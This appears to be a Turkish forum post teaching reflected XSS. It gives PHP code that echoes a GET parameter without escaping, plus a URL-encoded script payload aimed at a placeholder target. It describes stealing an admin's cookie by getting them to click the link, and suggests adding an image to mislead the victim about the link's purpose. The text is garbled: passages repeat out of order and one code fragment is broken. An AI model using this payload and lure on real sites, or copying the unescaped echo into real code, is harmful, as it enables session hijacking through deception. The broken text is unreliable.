dadaad.org da asd.php diye bir dosya olsun
Xss açığını yaratan hasarlı kodumuz yukarıda verdim
Şimdi böyle bir kodla karşılaştık diyelim
http%3A//hedefsiteadresi.com/asasa.php%3Fname_1%3Dscriptalert1%3B/script&r=&t=0
Site mysql ile çalışan bir databaseli sistemse admin e bir şekilde tıklatarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil
asd.php şu kodlar olsun
Sonuna herhangi bir resim de eklenilip amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.
Kod:
<form action="star.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
<?php
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);
?>
Xss açığını yaratan hasarlı kodumuz yukarıda verdim
Kod:
echo ($_GET[name_1])
Şimdi böyle bir kodla karşılaştık diyelim
http%3A//hedefsiteadresi.com/asasa.php%3Fname_1%3Dscriptalert1%3B/script&r=&t=0
Site mysql ile çalışan bir databaseli sistemse admin e bir şekilde tıklatarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil
asd.php şu kodlar olsun
Kod:
here $_GET[’Exploit
Sonuna herhangi bir resim de eklenilip amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.



